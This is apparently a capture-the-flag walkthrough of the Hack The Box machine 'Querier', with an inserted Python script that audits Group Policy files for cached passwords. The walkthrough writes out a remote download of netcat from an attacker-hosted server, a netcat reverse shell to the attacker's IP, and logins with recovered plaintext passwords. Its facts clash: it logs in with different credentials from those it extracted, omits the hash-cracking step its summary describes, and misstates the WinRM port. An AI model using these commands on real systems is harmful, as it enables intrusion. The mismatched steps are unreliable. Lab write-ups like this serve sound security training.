Summary
- OS — Windows
- Difficulty — Medium
- Released — February 16, 2019
- Creator — mrh4sh & egre55
Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.
Foothold
I'll start off by running Nmap, using the default NSE scripts with the -sC flag, enumerating service versions with the -sV flag, and writing the results to a file called 'scan.nmap' with the -o flag:
sudo nmap -sC -sV -o scan.nmap 10.10.10.125
First, I'll check if the RPC or SMB server allows null authentication:
rpcclient --user='' --no-pass 10.10.10.125
I'm able to get a null-authentication RPC shell, but all of the useful commands are disabled, so I'll pivot over to SMB:
smbclient -L //10.10.10.125 -N -m SMB2
The only non-default share is 'Reports' which I'll connect to and list the files present:
smbclient //10.10.10.125/Reports -N -m SMB2
dir
Interestingly, there's a netcat binary present, but the Excel macro-enabled spreadsheet interests me the most. I'll download this file to my local host, then transfer it over to a Windows host with Microsoft Office installed to view it:
mget "Currency Volume Report.xlsm"
With the spreadsheet opened, I'll click the 'Developer' tab, then select 'Visual Basic':

The macro is connecting to a remote Microsoft SQL Server (which I saw running on port 1433 in my Nmap scan) to pull data down into the spreadsheet. The connection portion of the macro exposes a plaintext username and password of 'reporting:PcwTWTHRwryjc$c6'.
I'll use these credentials to connect to the MSSQL Server remotely using Impacket's mssqlclient module:
impacket-mssqlclient QUERIER/'mssql-svc:corporate568'@10.10.10.125 -windows-auth
Once authenticated, I'll enable xp_cmdshell, which allows me to execute OS commands directly from the MSSQL shell. Then I'll use it to download nc64.exe to the box, which I'll use to spawn a reverse shell:
enable_xp_cmdshell
RECONFIGURE
I'll host the netcat binary locally:
python3 -m http.server 80
Then, I'll download nc64.exe to the box, set up a listener, and execute the netcat reverse shell:
xp_cmdshell powershell curl 10.10.15.254/nc64.exe -outfile C:\\programdata\\nc64.exe
rlwrap nc -lvnp 9001
xp_cmdshell C:\\programdata\\nc64.exe -e powershell.exe 10.10.15.254 9001
As shown above, I now have a shell on the box as the mssql-svc user.
Privilege Escalation — Administrator
First, I'll download and run PowerUp.ps1 on the box to see if it can identify any privilege escalation paths for me:
python3 -m http.server 80
curl 10.10.15.254/PowerUp.ps1 -outfile PowerUp.ps1
Next, I need to import the PowerUp.ps1 module by dot-sourcing it, then I can run the Invoke-AllChecks cmdlet:
. .\PowerUp.ps1
Invoke-AllChecks
PowerUp.ps1 finds a plaintext password of 'MyUnclesAreMarioAndLuigi!!1!' in an old Group Policy XML file for the Administrator user.
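The finding above is the classic Group Policy Preferences 'cpassword' weakness: a password cached in a GPP XML file in a reversible form. As an added example (not part of this write-up or of PowerUp), the following Python script shows how a defender can audit a SYSVOL Policies tree or a local GPO cache for the same condition; the XML below is constructed and the cpassword value is a placeholder, not a real encrypted blob.

```python
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample in the shape of a GPP Groups.xml; the cpassword value is a
# placeholder, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" changed="2018-06-01 12:00:00">
    <Properties action="U" cpassword="PLACEHOLDER-ENCRYPTED-BLOB" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator" />
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup">
    <Properties action="C" userName="svc_backup" />
  </User>
</Groups>
"""

# Attributes GPP uses to name the account in Groups/Services/ScheduledTasks/DataSources XML.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text: str, source: str = "<memory>") -> List[Dict[str, str]]:
    """Return one finding per element carrying a non-empty cpassword attribute."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        if not elem.get("cpassword"):  # absent or empty -> nothing cached here
            continue
        owner = parent_of.get(elem)  # the User/Service/Task element one level up
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
        if account is None and owner is not None:
            account = owner.get("name")
        changed = owner.get("changed") if owner is not None else None
        findings.append({"source": source, "element": elem.tag,
                         "account": account or "?", "changed": changed or "?"})
    return findings


def scan_tree(root_dir: str) -> List[Dict[str, str]]:
    """Walk a SYSVOL Policies tree or a local GPO cache and scan every .xml file."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except (OSError, ET.ParseError):
                pass  # unreadable or non-GPP XML: skip it rather than abort the scan
    return findings
```

Any hit is a remediation item: remove the password from the preference item and rotate the account, since the encryption key for cpassword has been public since 2012.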
Now, I can simply use Evil-WinRM (since I noticed port 5958 was open on my Nmap scan) to authenticate directly into the box as the Administrator user:
evil-winrm -i 10.10.10.125 -u Administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
As shown above, I now have a shell as the Administrator user on the box.